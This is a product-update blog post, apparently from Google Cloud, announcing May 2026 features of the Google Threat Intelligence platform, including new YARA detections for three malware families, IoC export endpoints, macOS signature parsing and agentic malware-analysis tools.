Author:
Tim Gallo, Google Cloud, Head of Customer Engineering
Detection Highlights
Our Google Threat Intelligence Group and FLARE teams are always working to update YARA rules to help customers stay ahead of emerging threats. This week, we've rolled out rules in the Google Threat Intelligence platform for three newly tracked malware families. We focus our updates on the threats we see most often in Mandiant engagements, Google Security Operations’ environments, and trending searches.
Whenever our research uncovers a new malware family, we quickly build and deploy the necessary detection signatures.
Here are a few recent examples:
-
SALATSTEALER: a Go-based crypto stealer that targets Windows browsers, cryptocurrency wallets, and Telegram clients (specifically Telegram Desktop and Kotatogram). It is capable of hijacking webcams and microphones to stream data directly to a C2 server.
-
SCARLETSMASHER: a Downloader used to download, compile and execute C# .NET code. See its curated YARA detection rule.
-
LAGUNARAT: a .NET-based Remote Access Trojan (RAT) backdoor designed to execute PowerShell commands, manipulate files on the host communicating with C2. See its curated YARA detection rule.
Beyond new threats, we're also keeping rules for established malware like VIDAR, EMPIRE, and EVILPUFFIN fresh. These updates help ensure you have the best coverage against evolving campaigns.
You can check out the latest malware profiles in our knowledge base or browse the full list of curated YARA rules.
Better Tools for Threat Profiles
Bulk IoC Downloads. Threat Profiles help you cut through the noise by highlighting the actors and campaigns most relevant to your specific risks. By tailoring these views, your team can focus on the threats that actually matter to your organization.
To make it easier to turn these insights into action, you can now bulk-export Indicators of Compromise (IoCs) from your profiles. We support JSON, CSV, and STIX formats, and you can choose whether to include full metadata.
If you want to automate things, we've added two new API endpoints:
-
GET /threat_profiles/{id}/download: Exports a package containing all actionable IoCs linked to a specific Threat Profile.
-
GET /threat_profiles/{id}/download_url: Retrieves the download URL to export packages exceeding 32MB.
Smart macOS File Reports
New self-signed Tags and CDHash Extraction. Our updated codesign parser makes it much easier to check if a digital signature is trustworthy. By showing details like certificate chains and validity directly in the file report, your team can quickly spot spoofed signatures without needing to dive into the code manually.
Key Capabilities:
-
New self-signed Tag: The codesign report now explicitly flags macOS binaries that are signed using self-issued certificates. This joins our existing suite of signature status indicators, such as invalid-signature and revoked-cert.
-
CDHash Extraction: The parser now extracts and displays the Code Directory Hash (CDHash)—the unique 20-byte cryptographic identifier used by Apple’s operating systems to verify the integrity and authenticity of a code-signed binary or bundle.
Take a look at this search example:
More Flexibility for Collections
Track your own Actors, Malware, and Campaigns. We use "threat objects" to help organize global intelligence into a clear story. These collections link forensic indicators to a broader narrative, giving your investigations more context.
We've expanded this framework so you can create your own custom entities directly on the platform. Any object you create is private by default, but you can easily share it with your team whenever you're ready.
By creating a private object, you can now combine your internal data with Google's global view, helping you map out unique attacker profiles. It standardizes how you document threats and speeds up attribution by linking new evidence to groups you've already defined.
New Third-Party Integrations
Integrations are key to making threat intelligence useful. They help you turn raw data into action, break down data silos, and speed up your response times (MTTR).
Our latest integrations include:
You can see the full list of our technology integrations here.
What's New with Agentic
Better Malware Analysis with a Persistent File System.
Agentic threat intelligence capabilities in Google Threat Intelligence are designed to automate your hunting and investigation workflows. It uses specialized agents that have direct access to Google Threat Intelligence data, meaning you don't have to pivot between tools manually. It translates raw data into simple summaries, changing how you interact with complex threats.
We're introducing a new persistent file system for the platform. This gives the agent an isolated environment to explore directories and read configs autonomously throughout a session. By carrying evidence forward, the agent can now perform much deeper dives into malicious behavior over an extended timeline.
HTA Analysis and De-obfuscation in Agentic.
Agentic threat intelligence delivers support for analyzing and de-obfuscating HTA files—a common way for attackers to get initial access. The agent can now pull apart complex HTA files while filtering out noise, helping you see the critical indicators faster.
Key Capabilities:
-
Advanced Evasion Detection: The agent immediately spots malware attempting to evade detection by masquerading as legitimate software (e.g., fraudulent updates).
-
Deep Code De-obfuscation: It natively decodes complex, custom encryption schemes (such as XOR layers) to reveal the underlying malicious script.
-
Full Attack Chain Visibility: It automatically extracts hidden secondary payloads and identifies Command & Control (C2) infrastructure, giving analysts a comprehensive picture of the threat vector.
Advanced Office Document Analysis in Agentic.
We've also improved how we handle Office documents. The agent now uses a structured approach to spot malicious macros and exploits in Word, Excel, and RTF files. It runs specialized tools and expert rules to give you a clear verdict: BENIGN, SUSPICIOUS, or MALICIOUS.
Key Capabilities:
-
Macro Heuristics & De-obfuscation: Automatically detects and analyzes suspicious VBA and Excel 4.0 macros, peeling back obfuscation layers to reveal hidden payloads.
-
Exploit Detection: Identifies known exploit patterns and initial access techniques, such as Equation Editor overflows and malicious remote template injections.
-
Structured Reporting: Generates a clean, analyst-ready report complete with a clear logical reasoning chain and raw supporting evidence.
By automating macro de-obfuscation and exploit detection, agentic threat intelligence provides security analysts with the clarity needed to confront complex document-based threats. This structured approach to reporting transforms raw technical findings into actionable insights, empowering teams to identify malicious payloads with significantly greater speed and accuracy.
In conclusion, the May 2026 updates represent a significant leap forward for the Google Threat Intelligence platform. From the introduction of new curated YARA rules and streamlined bulk IoC exports to enhanced macOS CDHash extraction and the flexibility of custom collections, these tools provide deeper visibility into the modern threat landscape. Combined with an expanded ecosystem of third-party integrations and the powerful new agentic AI capabilities—including a persistent file system and sophisticated document de-obfuscation—security teams are now better equipped than ever to contextualize emerging threats and drastically accelerate their response times.
